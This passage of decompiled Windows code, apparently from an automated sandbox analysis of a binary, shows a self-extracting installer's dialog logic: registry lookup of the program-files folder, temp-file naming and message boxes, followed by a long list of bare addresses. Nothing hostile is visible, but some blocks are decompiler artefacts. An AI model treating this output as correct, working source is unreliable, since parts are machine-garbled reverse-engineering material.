                                                                                                                                                  															 *(__ebp - 0xc) = 0x400;
                                                                                                                                                  															__eax = RegQueryValueExA( *(__ebp - 0x10), "ProgramFilesDir", 0, __ebp - 0x14, __ebp - 0x434, __ebp - 0xc); // executed
                                                                                                                                                  															__eax = RegCloseKey( *(__ebp - 0x10)); // executed
                                                                                                                                                  														}
                                                                                                                                                  														__eflags =  *(__ebp - 0x434);
                                                                                                                                                  														if( *(__ebp - 0x434) != 0) {
                                                                                                                                                  															__eax = __ebp - 0x434;
                                                                                                                                                  															__eax = E0040A35D(__ecx, __ebp - 0x434);
                                                                                                                                                  															__ecx = __ebp - 0x434;
                                                                                                                                                  															__ecx = __ebp - 0x433;
                                                                                                                                                  															__eflags =  *((char*)(__eax + __ecx)) - 0x5c;
                                                                                                                                                  															if( *((char*)(__eax + __ecx)) != 0x5c) {
                                                                                                                                                  																__ebp - 0x434 = E0040A5BB(__ebp - 0x434, "\\");
                                                                                                                                                  															}
                                                                                                                                                  														}
                                                                                                                                                  														__edi = E0040A35D(__ecx, __esi);
                                                                                                                                                  														__eax = __ebp - 0x434;
                                                                                                                                                  														__edi = __edi + E0040A35D(__ecx, __ebp - 0x434);
                                                                                                                                                  														__eflags = __edi - 0x3ff;
                                                                                                                                                  														if(__edi < 0x3ff) {
                                                                                                                                                  															__ebp - 0x434 = E0040A5BB(__ebp - 0x434, __esi);
                                                                                                                                                  														}
                                                                                                                                                  														goto L52;
                                                                                                                                                  													}
                                                                                                                                                  													L59:
                                                                                                                                                  													__eflags = __esi->i - 0x3a;
                                                                                                                                                  													if(__esi->i == 0x3a) {
                                                                                                                                                  														goto L51;
                                                                                                                                                  													}
                                                                                                                                                  													goto L60;
                                                                                                                                                  												}
                                                                                                                                                  												L49:
                                                                                                                                                  												__eflags = __esi->i - 0x5c;
                                                                                                                                                  												if(__esi->i != 0x5c) {
                                                                                                                                                  													goto L57;
                                                                                                                                                  												}
                                                                                                                                                  												L50:
                                                                                                                                                  												__esi =  &(__esi->i);
                                                                                                                                                  												__eflags = __esi->i;
                                                                                                                                                  												if(__esi->i == 0) {
                                                                                                                                                  													goto L152;
                                                                                                                                                  												}
                                                                                                                                                  												goto L51;
                                                                                                                                                  											}
                                                                                                                                                  										case 4:
                                                                                                                                                  											L67:
                                                                                                                                                  											__eflags =  *0x419f8c - 1;
                                                                                                                                                  											__eflags = __eax - 0x419f8c;
                                                                                                                                                  											 *__edi =  *__edi + __ecx;
                                                                                                                                                  											__eflags =  *(__ebp + 5) & __cl;
                                                                                                                                                  											 *__eax =  *__eax + __al;
                                                                                                                                                  											__eflags =  *__eax;
                                                                                                                                                  										case 5:
                                                                                                                                                  											L72:
                                                                                                                                                  											__eax =  *(__ebp - 0x1c34);
                                                                                                                                                  											__eax =  *(__ebp - 0x1c34);
                                                                                                                                                  											__eflags = __eax;
                                                                                                                                                  											if(__eax == 0) {
                                                                                                                                                  												L79:
                                                                                                                                                  												 *0x419edf = 0;
                                                                                                                                                  												 *0x419ede = 1;
                                                                                                                                                  												goto L152;
                                                                                                                                                  											}
                                                                                                                                                  											L73:
                                                                                                                                                  											__eax = __eax - 0x30;
                                                                                                                                                  											__eflags = __eax;
                                                                                                                                                  											if(__eax == 0) {
                                                                                                                                                  												L77:
                                                                                                                                                  												 *0x419edf = 0;
                                                                                                                                                  												L78:
                                                                                                                                                  												 *0x419ede = 0;
                                                                                                                                                  												goto L152;
                                                                                                                                                  											}
                                                                                                                                                  											L74:
                                                                                                                                                  											__eax = __eax - 1;
                                                                                                                                                  											__eflags = __eax;
                                                                                                                                                  											if(__eax == 0) {
                                                                                                                                                  												goto L79;
                                                                                                                                                  											}
                                                                                                                                                  											L75:
                                                                                                                                                  											__eax = __eax - 1;
                                                                                                                                                  											__eflags = __eax;
                                                                                                                                                  											if(__eax != 0) {
                                                                                                                                                  												goto L152;
                                                                                                                                                  											} else {
                                                                                                                                                  												 *0x419edf = 1;
                                                                                                                                                  												goto L78;
                                                                                                                                                  											}
                                                                                                                                                  										case 6:
                                                                                                                                                  											L85:
                                                                                                                                                  											__eflags =  *(__ebp + 0x10) - 4;
                                                                                                                                                  											if( *(__ebp + 0x10) != 4) {
                                                                                                                                                  												goto L152;
                                                                                                                                                  											}
                                                                                                                                                  											L86:
                                                                                                                                                  											_push(0);
                                                                                                                                                  											goto L87;
                                                                                                                                                  										case 7:
                                                                                                                                                  											L88:
                                                                                                                                                  											__eflags =  *(__ebp + 0x10) - 1;
                                                                                                                                                  											if( *(__ebp + 0x10) != 1) {
                                                                                                                                                  												L104:
                                                                                                                                                  												__eflags =  *(__ebp + 0x10) - 7;
                                                                                                                                                  												if( *(__ebp + 0x10) == 7) {
                                                                                                                                                  													__eflags =  *0x419f8c;
                                                                                                                                                  													if( *0x419f8c == 0) {
                                                                                                                                                  														 *0x419f8c = 2;
                                                                                                                                                  													}
                                                                                                                                                  													 *0x419f88 = 1;
                                                                                                                                                  												}
                                                                                                                                                  												goto L152;
                                                                                                                                                  											}
                                                                                                                                                  											L89:
                                                                                                                                                  											__ebp - 0xc34 = GetTempPathA(0x400, __ebp - 0xc34);
                                                                                                                                                  											__ebp - 0xc34 = E004076A1(__ebp - 0xc34);
                                                                                                                                                  											 *(__ebp - 4) =  *(__ebp - 4) & 0x00000000;
                                                                                                                                                  											_push(0);
                                                                                                                                                  											__ebx = "%s%s%d";
                                                                                                                                                  											while(1) {
                                                                                                                                                  												L91:
                                                                                                                                                  												_push( *0x41409c);
                                                                                                                                                  												__eax = __ebp - 0xc34;
                                                                                                                                                  												_push(__ebp - 0xc34);
                                                                                                                                                  												__eax = __ebp - 0x834;
                                                                                                                                                  												_push(__ebx);
                                                                                                                                                  												_push(__ebp - 0x834);
                                                                                                                                                  												__eax =  *__edi();
                                                                                                                                                  												__esp = __esp + 0x14;
                                                                                                                                                  												__eax = __ebp - 0x834;
                                                                                                                                                  												_push(__ebp - 0x834);
                                                                                                                                                  												__eax = __esi->i();
                                                                                                                                                  												__eflags = __eax - 0xffffffff;
                                                                                                                                                  												if(__eax == 0xffffffff) {
                                                                                                                                                  													break;
                                                                                                                                                  												}
                                                                                                                                                  												L90:
                                                                                                                                                  												_t128 = __ebp - 4;
                                                                                                                                                  												 *_t128 =  *(__ebp - 4) + 1;
                                                                                                                                                  												__eflags =  *_t128;
                                                                                                                                                  												_push( *(__ebp - 4));
                                                                                                                                                  											}
                                                                                                                                                  											L92:
                                                                                                                                                  											__ebp - 0x834 = SetDlgItemTextA( *(__ebp + 8), 0x65, __ebp - 0x834);
                                                                                                                                                  											__eflags =  *(__ebp - 0x1c34);
                                                                                                                                                  											if( *(__ebp - 0x1c34) == 0) {
                                                                                                                                                  												goto L152;
                                                                                                                                                  											}
                                                                                                                                                  											L93:
                                                                                                                                                  											__eflags =  *0x41a816;
                                                                                                                                                  											if( *0x41a816 != 0) {
                                                                                                                                                  												goto L152;
                                                                                                                                                  											}
                                                                                                                                                  											L94:
                                                                                                                                                  											__eax = __ebp - 0x1c34;
                                                                                                                                                  											 *(__ebp - 0x234) = 0;
                                                                                                                                                  											__eax = E0040A386(__ebp - 0x1c34, 0x2c);
                                                                                                                                                  											__eflags = __eax;
                                                                                                                                                  											if(__eax != 0) {
                                                                                                                                                  												L100:
                                                                                                                                                  												__eflags =  *(__ebp - 0x234);
                                                                                                                                                  												if( *(__ebp - 0x234) == 0) {
                                                                                                                                                  													__ebp - 0xb4dc = __ebp - 0x1c34;
                                                                                                                                                  													E0040A450(__ebp - 0x1c34, __ebp - 0xb4dc) = __ebp - 0xa4dc;
                                                                                                                                                  													__ebp - 0x234 = E0040A450(__ebp - 0x234, __ebp - 0xa4dc);
                                                                                                                                                  												}
                                                                                                                                                  												__ebp - 0x1c34 = E0040AB7A(__ebp - 0x1c34);
                                                                                                                                                  												__ebp - 0x234 = __ebp - 0x1c34;
                                                                                                                                                  												 *((char*)(__ebp - 0x1434)) = 0;
                                                                                                                                                  												__eax = MessageBoxA( *(__ebp + 8), __ebp - 0x1c34, __ebp - 0x234, 0x24);
                                                                                                                                                  												__eflags = __eax - 6;
                                                                                                                                                  												if(__eax == 6) {
                                                                                                                                                  													goto L152;
                                                                                                                                                  												} else {
                                                                                                                                                  													L103:
                                                                                                                                                  													0 = 1;
                                                                                                                                                  													__eflags = 1;
                                                                                                                                                  													 *0x41a815 = 1;
                                                                                                                                                  													 *0x419f78 = 1;
                                                                                                                                                  													__eax = EndDialog( *(__ebp + 8), 1);
                                                                                                                                                  													goto L104;
                                                                                                                                                  												}
                                                                                                                                                  											}
                                                                                                                                                  											L95:
                                                                                                                                                  											__esi = 0;
                                                                                                                                                  											__eflags =  *(__ebp - 0x1c34);
                                                                                                                                                  											if( *(__ebp - 0x1c34) == 0) {
                                                                                                                                                  												goto L100;
                                                                                                                                                  											} else {
                                                                                                                                                  												goto L96;
                                                                                                                                                  											}
                                                                                                                                                  											while(1) {
                                                                                                                                                  												L96:
                                                                                                                                                  												__eflags =  *((char*)(__ebp + __esi - 0x1c34)) - 0x40;
                                                                                                                                                  												if( *((char*)(__ebp + __esi - 0x1c34)) == 0x40) {
                                                                                                                                                  													break;
                                                                                                                                                  												}
                                                                                                                                                  												L97:
                                                                                                                                                  												__esi =  &(__esi->i);
                                                                                                                                                  												__eflags =  *((char*)(__ebp + __esi - 0x1c34));
                                                                                                                                                  												if( *((char*)(__ebp + __esi - 0x1c34)) != 0) {
                                                                                                                                                  													continue;
                                                                                                                                                  												}
                                                                                                                                                  												L98:
                                                                                                                                                  												goto L100;
                                                                                                                                                  											}
                                                                                                                                                  											L99:
                                                                                                                                                  											__ebp + __esi - 0x1c33 = __ebp - 0x234;
                                                                                                                                                  											__eax = E0040A450(__ebp - 0x234, __ebp + __esi - 0x1c33);
                                                                                                                                                  											 *((char*)(__ebp + __esi - 0x1c34)) = 0;
                                                                                                                                                  											goto L100;
                                                                                                                                                  										case 8:
                                                                                                                                                  											L108:
                                                                                                                                                  											__eflags =  *(__ebp + 0x10) - 3;
                                                                                                                                                  											if( *(__ebp + 0x10) == 3) {
                                                                                                                                                  												__eflags =  *(__ebp - 0x1c34);
                                                                                                                                                  												if(__eflags != 0) {
                                                                                                                                                  													__ebp - 0x1c34 = SetWindowTextA( *(__ebp + 8), __ebp - 0x1c34);
                                                                                                                                                  												}
                                                                                                                                                  												__esi = __ebp + 0xc;
                                                                                                                                                  												 *0x41a820 = E0040B793(__esi, __eflags);
                                                                                                                                                  											}
                                                                                                                                                  											 *0x41a817 = 1;
                                                                                                                                                  											goto L152;
                                                                                                                                                  										case 9:
                                                                                                                                                  											L113:
                                                                                                                                                  											__eflags =  *(__ebp + 0x10) - 5;
                                                                                                                                                  											if( *(__ebp + 0x10) != 5) {
                                                                                                                                                  												goto L152;
                                                                                                                                                  											}
                                                                                                                                                  											L114:
                                                                                                                                                  											_push(1);
                                                                                                                                                  											L87:
                                                                                                                                                  											__ebp - 0x1c34 = E0040BD59(__ebp - 0x1c34, __ecx); // executed
                                                                                                                                                  											goto L152;
                                                                                                                                                  										case 0xa:
                                                                                                                                                  											goto L0;
                                                                                                                                                  										case 0xb:
                                                                                                                                                  											L150:
                                                                                                                                                  											__eflags =  *(__ebp + 0x10) - 7;
                                                                                                                                                  											if( *(__ebp + 0x10) == 7) {
                                                                                                                                                  												 *0x419f90 = 1;
                                                                                                                                                  											}
                                                                                                                                                  											goto L152;
                                                                                                                                                  										case 0xc:
                                                                                                                                                  											L80:
                                                                                                                                                  											__eax =  *(__ebp - 0x1c34);
                                                                                                                                                  											__eax = E0040A229(__ecx,  *(__ebp - 0x1c34));
                                                                                                                                                  											__eflags = __eax - 0x46;
                                                                                                                                                  											if(__eax == 0x46) {
                                                                                                                                                  												 *0x419edd = 1;
                                                                                                                                                  											} else {
                                                                                                                                                  												__eflags = __eax - 0x55;
                                                                                                                                                  												if(__eax == 0x55) {
                                                                                                                                                  													 *0x419edc = 1;
                                                                                                                                                  												} else {
                                                                                                                                                  													 *0x419edd = 0;
                                                                                                                                                  													 *0x419edc = 0;
                                                                                                                                                  												}
                                                                                                                                                  											}
                                                                                                                                                  											goto L152;
                                                                                                                                                  									}
                                                                                                                                                  									L2:
                                                                                                                                                  									_t232 = E0040A8FE(_t232,  *(_t308 - 4));
                                                                                                                                                  									 *(_t308 - 4) =  *(_t308 - 4) + 0x1000;
                                                                                                                                                  									_t9 = _t308 - 0xc;
                                                                                                                                                  									 *_t9 =  *((intOrPtr*)(_t308 - 0xc)) - 1;
                                                                                                                                                  									if( *_t9 != 0) {
                                                                                                                                                  										goto L2;
                                                                                                                                                  									} else {
                                                                                                                                                  										 *(_t308 - 4) =  *(_t308 - 4) & 0x00000000;
                                                                                                                                                  										goto L4;
                                                                                                                                                  									}
                                                                                                                                                  								}
                                                                                                                                                  								return _t231;
                                                                                                                                                  							}
                                                                                                                                                  							goto L147;
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  					goto L152;
                                                                                                                                                  				}
                                                                                                                                                  			}








                                                                                                                                                  0x0040c770
                                                                                                                                                  0x0040c770
                                                                                                                                                  0x0040c770
                                                                                                                                                  0x0040c770
                                                                                                                                                  0x0040c774
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c77a
                                                                                                                                                  0x0040c77a
                                                                                                                                                  0x0040c782
                                                                                                                                                  0x0040c787
                                                                                                                                                  0x0040c787
                                                                                                                                                  0x0040c78a
                                                                                                                                                  0x0040c7af
                                                                                                                                                  0x0040c78c
                                                                                                                                                  0x0040c78c
                                                                                                                                                  0x0040c78c
                                                                                                                                                  0x0040c78f
                                                                                                                                                  0x0040c7a6
                                                                                                                                                  0x0040c791
                                                                                                                                                  0x0040c791
                                                                                                                                                  0x0040c791
                                                                                                                                                  0x0040c792
                                                                                                                                                  0x0040c79d
                                                                                                                                                  0x0040c794
                                                                                                                                                  0x0040c794
                                                                                                                                                  0x0040c794
                                                                                                                                                  0x0040c792
                                                                                                                                                  0x0040c78f
                                                                                                                                                  0x0040c7bd
                                                                                                                                                  0x0040c7c4
                                                                                                                                                  0x0040c7cb
                                                                                                                                                  0x0040c7d2
                                                                                                                                                  0x0040c7d7
                                                                                                                                                  0x0040c7de
                                                                                                                                                  0x0040c81f
                                                                                                                                                  0x0040c828
                                                                                                                                                  0x0040c82d
                                                                                                                                                  0x0040c82f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c831
                                                                                                                                                  0x0040c831
                                                                                                                                                  0x0040c833
                                                                                                                                                  0x0040c83a
                                                                                                                                                  0x0040c840
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c842
                                                                                                                                                  0x0040c842
                                                                                                                                                  0x0040c842
                                                                                                                                                  0x0040c844
                                                                                                                                                  0x0040c847
                                                                                                                                                  0x0040c84e
                                                                                                                                                  0x0040c850
                                                                                                                                                  0x0040c857
                                                                                                                                                  0x0040c85a
                                                                                                                                                  0x0040c85f
                                                                                                                                                  0x0040c861
                                                                                                                                                  0x0040c893
                                                                                                                                                  0x0040c893
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c893
                                                                                                                                                  0x0040c863
                                                                                                                                                  0x0040c863
                                                                                                                                                  0x0040c865
                                                                                                                                                  0x0040c868
                                                                                                                                                  0x0040c87c
                                                                                                                                                  0x0040c87c
                                                                                                                                                  0x0040c87c
                                                                                                                                                  0x0040c87d
                                                                                                                                                  0x0040c87d
                                                                                                                                                  0x0040c882
                                                                                                                                                  0x0040c883
                                                                                                                                                  0x0040c889
                                                                                                                                                  0x0040c889
                                                                                                                                                  0x0040c88a
                                                                                                                                                  0x0040c88f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c88f
                                                                                                                                                  0x0040c86a
                                                                                                                                                  0x0040c86a
                                                                                                                                                  0x0040c86a
                                                                                                                                                  0x0040c86d
                                                                                                                                                  0x0040c86e
                                                                                                                                                  0x0040c874
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c874
                                                                                                                                                  0x0040c849
                                                                                                                                                  0x0040c849
                                                                                                                                                  0x0040c84c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c895
                                                                                                                                                  0x0040c895
                                                                                                                                                  0x0040c896
                                                                                                                                                  0x0040c896
                                                                                                                                                  0x0040c89b
                                                                                                                                                  0x0040c89d
                                                                                                                                                  0x0040c89f
                                                                                                                                                  0x0040c89f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c7e0
                                                                                                                                                  0x0040c7e0
                                                                                                                                                  0x0040c7e7
                                                                                                                                                  0x0040c7f5
                                                                                                                                                  0x0040c7fc
                                                                                                                                                  0x0040c801
                                                                                                                                                  0x0040c803
                                                                                                                                                  0x0040c809
                                                                                                                                                  0x0040c815
                                                                                                                                                  0x0040c815
                                                                                                                                                  0x0040c8a2
                                                                                                                                                  0x0040c8a2
                                                                                                                                                  0x0040c8a9
                                                                                                                                                  0x0040c8b2
                                                                                                                                                  0x0040c8b9
                                                                                                                                                  0x0040c8b9
                                                                                                                                                  0x0040c8c5
                                                                                                                                                  0x0040c8d4
                                                                                                                                                  0x0040c8db
                                                                                                                                                  0x0040c8e7
                                                                                                                                                  0x0040c8ec
                                                                                                                                                  0x0040c8f3
                                                                                                                                                  0x0040c8fc
                                                                                                                                                  0x0040c908
                                                                                                                                                  0x0040c90f
                                                                                                                                                  0x0040c90f
                                                                                                                                                  0x0040c91b
                                                                                                                                                  0x0040c922
                                                                                                                                                  0x0040c927
                                                                                                                                                  0x0040c92e
                                                                                                                                                  0x0040c934
                                                                                                                                                  0x0040c936
                                                                                                                                                  0x0040c936
                                                                                                                                                  0x0040c94a
                                                                                                                                                  0x0040c94f
                                                                                                                                                  0x0040c956
                                                                                                                                                  0x0040c95b
                                                                                                                                                  0x0040c95d
                                                                                                                                                  0x0040c96e
                                                                                                                                                  0x0040c97a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c95f
                                                                                                                                                  0x0040c95f
                                                                                                                                                  0x0040c965
                                                                                                                                                  0x0040c96a
                                                                                                                                                  0x0040c96c
                                                                                                                                                  0x0040c97f
                                                                                                                                                  0x0040c98a
                                                                                                                                                  0x0040c996
                                                                                                                                                  0x0040c998
                                                                                                                                                  0x0040c99a
                                                                                                                                                  0x0040c9a3
                                                                                                                                                  0x0040c9aa
                                                                                                                                                  0x0040c9ac
                                                                                                                                                  0x0040c9ae
                                                                                                                                                  0x0040c9b7
                                                                                                                                                  0x0040c9be
                                                                                                                                                  0x0040c9c0
                                                                                                                                                  0x0040c9c2
                                                                                                                                                  0x0040c9cb
                                                                                                                                                  0x0040c9d9
                                                                                                                                                  0x0040c9de
                                                                                                                                                  0x0040c9e5
                                                                                                                                                  0x0040c9e9
                                                                                                                                                  0x0040c9f7
                                                                                                                                                  0x0040c9f7
                                                                                                                                                  0x0040ca0c
                                                                                                                                                  0x0040ca0c
                                                                                                                                                  0x0040ca1b
                                                                                                                                                  0x0040ca2a
                                                                                                                                                  0x0040ca2f
                                                                                                                                                  0x0040ca33
                                                                                                                                                  0x0040ca39
                                                                                                                                                  0x0040bfba
                                                                                                                                                  0x0040bfd1
                                                                                                                                                  0x0040bfd7
                                                                                                                                                  0x0040bfda
                                                                                                                                                  0x0040bfda
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bffa
                                                                                                                                                  0x0040c015
                                                                                                                                                  0x0040c01c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c01e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c01e
                                                                                                                                                  0x0040c01c
                                                                                                                                                  0x0040c023
                                                                                                                                                  0x0040c027
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c02d
                                                                                                                                                  0x0040c030
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c037
                                                                                                                                                  0x0040c037
                                                                                                                                                  0x0040c03b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c041
                                                                                                                                                  0x0040c04d
                                                                                                                                                  0x0040c061
                                                                                                                                                  0x0040c06d
                                                                                                                                                  0x0040c080
                                                                                                                                                  0x0040c08b
                                                                                                                                                  0x0040c09d
                                                                                                                                                  0x0040c0a8
                                                                                                                                                  0x0040c0ad
                                                                                                                                                  0x0040c0b6
                                                                                                                                                  0x0040c0bc
                                                                                                                                                  0x0040c0c1
                                                                                                                                                  0x0040c0c3
                                                                                                                                                  0x0040c22f
                                                                                                                                                  0x0040c235
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c0c9
                                                                                                                                                  0x0040c0c9
                                                                                                                                                  0x0040c0ce
                                                                                                                                                  0x0040c0ce
                                                                                                                                                  0x0040c0d7
                                                                                                                                                  0x0040c0dd
                                                                                                                                                  0x0040c0e4
                                                                                                                                                  0x0040c194
                                                                                                                                                  0x0040c19b
                                                                                                                                                  0x0040c19d
                                                                                                                                                  0x0040c1a0
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c1a2
                                                                                                                                                  0x0040c1a9
                                                                                                                                                  0x0040c1af
                                                                                                                                                  0x0040c1b1
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c1b3
                                                                                                                                                  0x0040c1b3
                                                                                                                                                  0x0040c1b6
                                                                                                                                                  0x0040c1b7
                                                                                                                                                  0x0040c1bf
                                                                                                                                                  0x0040c1ce
                                                                                                                                                  0x0040c1d0
                                                                                                                                                  0x0040c1da
                                                                                                                                                  0x0040c1dc
                                                                                                                                                  0x0040c1df
                                                                                                                                                  0x0040c1b9
                                                                                                                                                  0x0040c1b9
                                                                                                                                                  0x0040c1b9
                                                                                                                                                  0x0040c1bc
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c1e1
                                                                                                                                                  0x0040c1ef
                                                                                                                                                  0x0040c1f5
                                                                                                                                                  0x0040c1f7
                                                                                                                                                  0x0040c1f9
                                                                                                                                                  0x0040c1fe
                                                                                                                                                  0x0040c200
                                                                                                                                                  0x0040c20d
                                                                                                                                                  0x0040c20d
                                                                                                                                                  0x0040c200
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c1f7
                                                                                                                                                  0x0040c1df
                                                                                                                                                  0x0040c1b1
                                                                                                                                                  0x0040c0ea
                                                                                                                                                  0x0040c0ef
                                                                                                                                                  0x0040c0f2
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c0f8
                                                                                                                                                  0x0040c106
                                                                                                                                                  0x0040c112
                                                                                                                                                  0x0040c11e
                                                                                                                                                  0x0040c123
                                                                                                                                                  0x0040c126
                                                                                                                                                  0x0040c129
                                                                                                                                                  0x0040c13c
                                                                                                                                                  0x0040c145
                                                                                                                                                  0x0040c14a
                                                                                                                                                  0x0040c14c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c152
                                                                                                                                                  0x0040c160
                                                                                                                                                  0x0040c16e
                                                                                                                                                  0x0040c173
                                                                                                                                                  0x0040c175
                                                                                                                                                  0x0040c176
                                                                                                                                                  0x0040c180
                                                                                                                                                  0x0040c187
                                                                                                                                                  0x0040c18e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c18e
                                                                                                                                                  0x0040c12b
                                                                                                                                                  0x0040c132
                                                                                                                                                  0x0040c137
                                                                                                                                                  0x0040c13a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c213
                                                                                                                                                  0x0040c213
                                                                                                                                                  0x0040c21c
                                                                                                                                                  0x0040c222
                                                                                                                                                  0x0040c227
                                                                                                                                                  0x0040c227
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c0ce
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c23f
                                                                                                                                                  0x0040c23f
                                                                                                                                                  0x0040c243
                                                                                                                                                  0x0040c262
                                                                                                                                                  0x0040c266
                                                                                                                                                  0x0040c270
                                                                                                                                                  0x0040c278
                                                                                                                                                  0x0040c268
                                                                                                                                                  0x0040c268
                                                                                                                                                  0x0040c268
                                                                                                                                                  0x0040c27a
                                                                                                                                                  0x0040c27c
                                                                                                                                                  0x0040c28d
                                                                                                                                                  0x0040c27e
                                                                                                                                                  0x0040c27e
                                                                                                                                                  0x0040c27e
                                                                                                                                                  0x0040c295
                                                                                                                                                  0x0040c2a0
                                                                                                                                                  0x0040c2a5
                                                                                                                                                  0x0040c2aa
                                                                                                                                                  0x0040c2ac
                                                                                                                                                  0x0040c2ae
                                                                                                                                                  0x0040c2ae
                                                                                                                                                  0x0040c2b3
                                                                                                                                                  0x0040c2b8
                                                                                                                                                  0x0040c2bc
                                                                                                                                                  0x0040c2c3
                                                                                                                                                  0x0040c2c3
                                                                                                                                                  0x0040c2bc
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c2cd
                                                                                                                                                  0x0040c2cd
                                                                                                                                                  0x0040c2d1
                                                                                                                                                  0x0040c2e1
                                                                                                                                                  0x0040c2e1
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c2ec
                                                                                                                                                  0x0040c2ec
                                                                                                                                                  0x0040c2f0
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c2f6
                                                                                                                                                  0x0040c2f6
                                                                                                                                                  0x0040c2fd
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c303
                                                                                                                                                  0x0040c303
                                                                                                                                                  0x0040c30a
                                                                                                                                                  0x0040c310
                                                                                                                                                  0x0040c317
                                                                                                                                                  0x0040c319
                                                                                                                                                  0x0040c319
                                                                                                                                                  0x0040c320
                                                                                                                                                  0x0040c325
                                                                                                                                                  0x0040c32a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c330
                                                                                                                                                  0x0040c330
                                                                                                                                                  0x0040c330
                                                                                                                                                  0x0040c332
                                                                                                                                                  0x0040c334
                                                                                                                                                  0x0040c3ea
                                                                                                                                                  0x0040c3ea
                                                                                                                                                  0x0040c3ec
                                                                                                                                                  0x0040c350
                                                                                                                                                  0x0040c358
                                                                                                                                                  0x0040c35d
                                                                                                                                                  0x0040c35f
                                                                                                                                                  0x0040c366
                                                                                                                                                  0x0040c36b
                                                                                                                                                  0x0040c36d
                                                                                                                                                  0x0040c36f
                                                                                                                                                  0x0040c373
                                                                                                                                                  0x0040c375
                                                                                                                                                  0x0040c375
                                                                                                                                                  0x0040c373
                                                                                                                                                  0x0040c380
                                                                                                                                                  0x0040c38c
                                                                                                                                                  0x0040c39c
                                                                                                                                                  0x0040c3a6
                                                                                                                                                  0x0040c3b5
                                                                                                                                                  0x0040c3bb
                                                                                                                                                  0x0040c3c3
                                                                                                                                                  0x0040c3c8
                                                                                                                                                  0x0040c3ca
                                                                                                                                                  0x0040c3df
                                                                                                                                                  0x0040c3df
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c3ca
                                                                                                                                                  0x0040c3f2
                                                                                                                                                  0x0040c3f2
                                                                                                                                                  0x0040c3f4
                                                                                                                                                  0x0040c400
                                                                                                                                                  0x0040c400
                                                                                                                                                  0x0040c412
                                                                                                                                                  0x0040c418
                                                                                                                                                  0x0040c41a
                                                                                                                                                  0x0040c420
                                                                                                                                                  0x0040c427
                                                                                                                                                  0x0040c435
                                                                                                                                                  0x0040c43c
                                                                                                                                                  0x0040c445
                                                                                                                                                  0x0040c445
                                                                                                                                                  0x0040c44b
                                                                                                                                                  0x0040c452
                                                                                                                                                  0x0040c454
                                                                                                                                                  0x0040c45b
                                                                                                                                                  0x0040c460
                                                                                                                                                  0x0040c466
                                                                                                                                                  0x0040c467
                                                                                                                                                  0x0040c46b
                                                                                                                                                  0x0040c479
                                                                                                                                                  0x0040c479
                                                                                                                                                  0x0040c46b
                                                                                                                                                  0x0040c484
                                                                                                                                                  0x0040c486
                                                                                                                                                  0x0040c492
                                                                                                                                                  0x0040c494
                                                                                                                                                  0x0040c49a
                                                                                                                                                  0x0040c4a8
                                                                                                                                                  0x0040c4a8
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c49a
                                                                                                                                                  0x0040c3f6
                                                                                                                                                  0x0040c3f6
                                                                                                                                                  0x0040c3fa
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c3fa
                                                                                                                                                  0x0040c33a
                                                                                                                                                  0x0040c33a
                                                                                                                                                  0x0040c33e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c344
                                                                                                                                                  0x0040c344
                                                                                                                                                  0x0040c347
                                                                                                                                                  0x0040c34a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c34a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c4b2
                                                                                                                                                  0x0040c4b2
                                                                                                                                                  0x0040c4b3
                                                                                                                                                  0x0040c4b8
                                                                                                                                                  0x0040c4ba
                                                                                                                                                  0x0040c4bd
                                                                                                                                                  0x0040c4bd
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c4f3
                                                                                                                                                  0x0040c4f3
                                                                                                                                                  0x0040c4fa
                                                                                                                                                  0x0040c4fa
                                                                                                                                                  0x0040c4fd
                                                                                                                                                  0x0040c52a
                                                                                                                                                  0x0040c52a
                                                                                                                                                  0x0040c531
                                                                                                                                                  0x00000000
